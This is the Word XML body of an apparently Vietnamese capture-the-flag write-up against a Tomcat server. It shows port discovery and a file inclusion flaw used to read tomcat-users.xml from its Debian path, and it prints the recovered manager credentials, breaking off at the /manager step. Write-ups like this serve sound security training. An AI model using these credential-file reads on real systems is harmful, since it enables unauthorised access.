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FB8E2" w14:textId="62BB9686" w:rsidR="007E1007" w:rsidRPr="007E1007" w:rsidRDefault="007E1007">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E1007">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751D5D28" w14:textId="518A7187" w:rsidR="002F49FE" w:rsidRDefault="007E1007">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E1007">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26A0C2B4" wp14:editId="1A38E268">
            <wp:extent cx="5943600" cy="33896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3750" w14:textId="6C80C7C9" w:rsidR="007E1007" w:rsidRDefault="007E1007">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="237D4E0D" w14:textId="597CB64D" w:rsidR="007E1007" w:rsidRDefault="007E100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Dịch vụ mạng chỉ có Web và SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206A95E5" w14:textId="34053793" w:rsidR="007E1007" w:rsidRDefault="007E1007">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4731E3E2" w14:textId="12187701" w:rsidR="007E1007" w:rsidRPr="007E1007" w:rsidRDefault="007E1007">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E1007">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9A0A59" w14:textId="638BDFE2" w:rsidR="007E1007" w:rsidRDefault="007E1007">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0818BBFE" w14:textId="3589E379" w:rsidR="007E1007" w:rsidRDefault="00837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hai dịch vụ web chạy ở cổng 80 và 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E85E45" w14:textId="3E753138" w:rsidR="00CD1E54" w:rsidRDefault="00CD1E54">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6573C109" w14:textId="0BAC164C" w:rsidR="00837B26" w:rsidRDefault="00CD1E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hoạt động ở cổng 8080:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C74F6EF" w14:textId="63E00AD1" w:rsidR="00837B26" w:rsidRDefault="001D291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AAAAC5" wp14:editId="24F2A4E1">
            <wp:extent cx="5943600" cy="25673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F062" w14:textId="55657E89" w:rsidR="001D2912" w:rsidRDefault="001D291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Máy chủ web là Apache Tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B42510" w14:textId="66FEA1BD" w:rsidR="001D2912" w:rsidRDefault="001D2912">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="518FC213" w14:textId="71923F9A" w:rsidR="001D2912" w:rsidRDefault="001D291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tìm được hai đường dẫn: /manager, /host-manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129EF953" w14:textId="09FFF320" w:rsidR="001D2912" w:rsidRDefault="001D2912">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B1ED9BC" w14:textId="68786003" w:rsidR="0054118A" w:rsidRDefault="005411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yêu cầu đăng nhập:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0843B4" w14:textId="3738FA70" w:rsidR="0054118A" w:rsidRDefault="0054118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3F09B4" wp14:editId="15FD7332">
            <wp:extent cx="5268772" cy="2270760"/>
            <wp:effectExtent l="0" t="0" r="1905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2" t="15616" r="10332" b="23235"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5270556" cy="2271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C7A26" w14:textId="40C0DA96" w:rsidR="0054118A" w:rsidRDefault="0054118A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="418E93F8" w14:textId="39124EB5" w:rsidR="0054118A" w:rsidRDefault="0054118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hoạt động ở cổng 80:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6247F4" w14:textId="3A994335" w:rsidR="0054118A" w:rsidRDefault="008927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F28E17" wp14:editId="678A2ACF">
            <wp:extent cx="5219814" cy="27425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1" t="15087" r="10330" b="11061"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5221464" cy="2743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41356" w14:textId="2B567DDF" w:rsidR="008927AA" w:rsidRDefault="008927AA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30278D42" w14:textId="77777777" w:rsidR="008927AA" w:rsidRDefault="008927AA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67CADD1F" w14:textId="12FDAB92" w:rsidR="001D2912" w:rsidRDefault="00B8098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42B5A1" wp14:editId="23E4938F">
            <wp:extent cx="5943600" cy="922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BB29E" w14:textId="5DF0222D" w:rsidR="00B8098C" w:rsidRDefault="00B8098C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79139C18" w14:textId="08C88A08" w:rsidR="00B8098C" w:rsidRDefault="00B8098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Bị dính lỗ hổng File Inclusion:</w:t>
      </w:r>
      <w:r w:rsidR="00EC3DE6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E6171CA" wp14:editId="4FAF650E">
            <wp:extent cx="5943600" cy="16287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40577" w14:textId="68324E51" w:rsidR="00EC3DE6" w:rsidRDefault="00EC3DE6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CF35A15" w14:textId="405F1201" w:rsidR="00EC3DE6" w:rsidRDefault="006E26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cố gắng đọc tệp </w:t>
      </w:r>
      <w:r w:rsidRPr="006E2623">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tomcat-users.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> để đăng nhập tài khoản admin bên trang web 8080 nhưng không được</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4297C5" w14:textId="07C51E29" w:rsidR="0049253B" w:rsidRDefault="0049253B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3022CA36" w14:textId="19394B54" w:rsidR="0049253B" w:rsidRDefault="0049253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Dựa vào tài liệu của tomcat9 và trang mặc định, mình tìm được vị trí của tomcat-users.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8A05B4" w14:textId="6309AA86" w:rsidR="00C925DB" w:rsidRDefault="00C925DB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04DFB252" w14:textId="70DAAC79" w:rsidR="00C925DB" w:rsidRPr="00955B94" w:rsidRDefault="00C925DB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00955B94">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CATALINA_HOME ở /usr/share/tomcat9 và CATALINA_BASE ở /var/lib/tomcat9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFF8749" w14:textId="67F5EDDC" w:rsidR="00707618" w:rsidRPr="00955B94" w:rsidRDefault="00707618">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60B2F1F4" w14:textId="6784B662" w:rsidR="00707618" w:rsidRPr="00955B94" w:rsidRDefault="00414EAB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00955B94">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$CATALINA_BASE/conf/server.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6955C09D" w14:textId="10AE6305" w:rsidR="00414EAB" w:rsidRDefault="00414EAB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00955B94">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$CATALINA_BASE/conf/tomcat-users.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1961AE" w14:textId="34136A96" w:rsidR="00955B94" w:rsidRPr="00955B94" w:rsidRDefault="00955B94">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00955B94">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/etc/tomcat9/tomcat-users.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033D96BE" w14:textId="6CCC9DE9" w:rsidR="00414EAB" w:rsidRPr="00955B94" w:rsidRDefault="00414EAB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00D2D7E8" w14:textId="734807C9" w:rsidR="00414EAB" w:rsidRPr="00955B94" w:rsidRDefault="00414EAB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00955B94">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;user username="craigmcc" password="secret" roles="standard,manager-script" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF83B7F" w14:textId="2641D830" w:rsidR="0044142A" w:rsidRDefault="0049253B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049253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Đường dẫn trang web đưa ra là giả nhằm</w:t>
      </w:r>
      <w:r w:rsidR="009F2663">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> đánh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0002617C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lừa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> người </w:t>
      </w:r>
      <w:r w:rsidR="0002617C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dùng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F235ADC" w14:textId="0A61AF86" w:rsidR="00E2631C" w:rsidRDefault="00E2631C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6097560F" w14:textId="59601225" w:rsidR="00E2631C" w:rsidRDefault="000B57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Nhờ vậy, mình mới biết </w:t>
      </w:r>
      <w:r w:rsidR="007B6254">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thêm 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> cách </w:t>
      </w:r>
      <w:r w:rsidR="007B6254">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">để </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">tìm thư mục bị ẩn </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A4F6C6" w14:textId="349BE1E6" w:rsidR="007B6254" w:rsidRDefault="007B6254">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B35F178" w14:textId="0D99C2B7" w:rsidR="007B6254" w:rsidRDefault="007B62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Ở bài này, mình sẽ hướng dẫn chi tiết</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4757F74D" w14:textId="14B71539" w:rsidR="007B6254" w:rsidRDefault="007B6254">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D1B3BB5" w14:textId="75711B2A" w:rsidR="007B6254" w:rsidRDefault="007B62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kiếm cụm từ "</w:t>
      </w:r>
      <w:r w:rsidRPr="00901689">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>debian file list of package tomcat9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2C046F" w14:textId="26B2D8A3" w:rsidR="00BC4BDC" w:rsidRDefault="00BC4BDC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="362DB58A" w14:textId="77777777" w:rsidR="00BC4BDC" w:rsidRDefault="00BC4BDC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="255A5223" w14:textId="150DCCC1" w:rsidR="007B6254" w:rsidRDefault="007B6254">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D74B8E4" w14:textId="6FE1138F" w:rsidR="007B6254" w:rsidRDefault="00BC4BD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CCCEBDA" wp14:editId="1FF75E15">
            <wp:extent cx="5943600" cy="15697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3D2D" w14:textId="3F0FB44D" w:rsidR="00BC4BDC" w:rsidRDefault="00BC4BDC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43273EBF" w14:textId="5FB22573" w:rsidR="000B57D8" w:rsidRDefault="00BC4B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Có rất nhiều package tomcat9: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC4BDC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tomcat9-admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC4BDC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tomcat9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-common, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC4BDC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tomcat9-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>docs, tomcat9-examples. Mình chọn đúng tomcat9</w:t>
      </w:r>
      <w:r w:rsidR="00492BC6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (oldoldstable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735F60E0" w14:textId="0D21AE29" w:rsidR="0049253B" w:rsidRDefault="00492BC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416F15" wp14:editId="3180B37C">
            <wp:extent cx="5943600" cy="12801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31291" w14:textId="75944F0D" w:rsidR="00492BC6" w:rsidRDefault="00492BC6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01C0EA43" w14:textId="09E332E2" w:rsidR="0049253B" w:rsidRDefault="00F058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Kéo xuống dưới cùng, chọn list of files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604D7B78" w14:textId="6C23B1D6" w:rsidR="005F77F1" w:rsidRDefault="00F0587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C53BE9" wp14:editId="470713ED">
            <wp:extent cx="5943600" cy="7327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3F40" w14:textId="7709524A" w:rsidR="00F05875" w:rsidRDefault="00F05875">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BA6CB22" w14:textId="05CBF965" w:rsidR="00F05875" w:rsidRDefault="009F266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sẽ thấy </w:t>
      </w:r>
      <w:r w:rsidRPr="009F2663">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tomcat-users.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ở một vị trí khác: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132C2E66" w14:textId="77777777" w:rsidR="009F2663" w:rsidRDefault="009F2663">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AABFCD1" w14:textId="5886467D" w:rsidR="006E2623" w:rsidRPr="00901689" w:rsidRDefault="009F2663">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00901689">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/usr/share/tomcat9/etc/tomcat-users.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139ECF0E" w14:textId="324B1874" w:rsidR="006E2623" w:rsidRDefault="0090168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425FE1" wp14:editId="501F36CD">
            <wp:extent cx="5943600" cy="406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5FB54" w14:textId="48B7692E" w:rsidR="00901689" w:rsidRDefault="00901689">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F4AF53C" w14:textId="4E637FF5" w:rsidR="00901689" w:rsidRPr="009E3185" w:rsidRDefault="00FA7A6B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E3185">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tomcat : $3cureP4s5w0rd123!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A30CC45" w14:textId="51F4C206" w:rsidR="00FA7A6B" w:rsidRDefault="00FA7A6B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35C4312E" w14:textId="662BE91C" w:rsidR="00A40DA1" w:rsidRDefault="00A40DA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Tài khoản tomcat có hai đặc quyền: admin-gui</w:t>
      </w:r>
      <w:r w:rsidR="00C247AB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (/host-manager)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> và manager-script</w:t>
      </w:r>
      <w:r w:rsidR="00C247AB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (/manager)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D777052" w14:textId="77777777" w:rsidR="00597014" w:rsidRDefault="00597014">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F479803" w14:textId="0355C8E1" w:rsidR="009334E5" w:rsidRDefault="00C247A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/host-manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D08025C" w14:textId="77777777" w:rsidR="00C247AB" w:rsidRDefault="00C247AB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11ED76C6" w14:textId="61E80052" w:rsidR="00142FEE" w:rsidRDefault="00142F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web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C613C82" w14:textId="58F965B7" w:rsidR="00142FEE" w:rsidRDefault="00142FE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893B90F" wp14:editId="4E100E17">
            <wp:extent cx="5211097" cy="2969042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8" t="15882" r="11142" b="4170"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5212562" cy="2969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003C1" w14:textId="1B1ADDE6" w:rsidR="00142FEE" w:rsidRDefault="00142FEE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70BF8663" w14:textId="620EDDE2" w:rsidR="00142FEE" w:rsidRDefault="00B2280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Bị tắt tính năng thực thi lệnh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAA4AF6" w14:textId="725B44A2" w:rsidR="00142FEE" w:rsidRDefault="00B2280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0286F0" wp14:editId="2E0728BB">
            <wp:extent cx="5943600" cy="5988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0279" w14:textId="681CAD1A" w:rsidR="00A8539D" w:rsidRDefault="00A8539D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C1CCE0E" w14:textId="5FFEE6D0" w:rsidR="009A5AA9" w:rsidRDefault="009A5A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/manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BC039E" w14:textId="42E3A222" w:rsidR="00BB21A9" w:rsidRDefault="00BB21A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31CFD51C" w14:textId="50E99340" w:rsidR="00BB21A9" w:rsidRDefault="009663E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FBFA12" wp14:editId="453A1330">
            <wp:extent cx="5943600" cy="2519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E85A" w14:textId="6F587FF6" w:rsidR="009663EA" w:rsidRDefault="009663EA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
